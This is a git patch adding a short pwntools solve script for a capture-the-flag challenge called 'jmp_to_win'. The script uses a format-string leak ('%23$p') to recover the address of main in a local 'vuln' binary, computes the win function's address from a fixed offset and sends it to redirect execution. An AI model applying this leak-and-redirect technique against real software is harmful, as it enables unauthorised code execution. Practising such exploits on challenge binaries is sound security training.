From 7ccc26a4f627d5b9cbd0a31b0c23339817cf0468 Mon Sep 17 00:00:00 2001
From: jc <jc@git.server>
Date: Wed, 12 Mar 2025 21:26:39 +0300
Subject: [PATCH] solve script

---
 random_challs/jmp_to_win/a.py | 21 +++++++++++++++++++++
 1 file changed, 21 insertions(+)
 create mode 100644 random_challs/jmp_to_win/a.py

diff --git a/random_challs/jmp_to_win/a.py b/random_challs/jmp_to_win/a.py
new file mode 100644
index 0000000..59854db
--- /dev/null
+++ b/random_challs/jmp_to_win/a.py
@@ -0,0 +1,21 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./vuln", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.sendlineafter(b":", a)
+
+# leak
+s(b"%23$p")
+main = int(r.recvline(), 16)
+log.info("main: %#x", main)
+win = main - 0x96
+log.info("win: %#x", win)
+
+# jmp
+s(str(hex(win)).encode())
+
+r.interactive()
\ No newline at end of file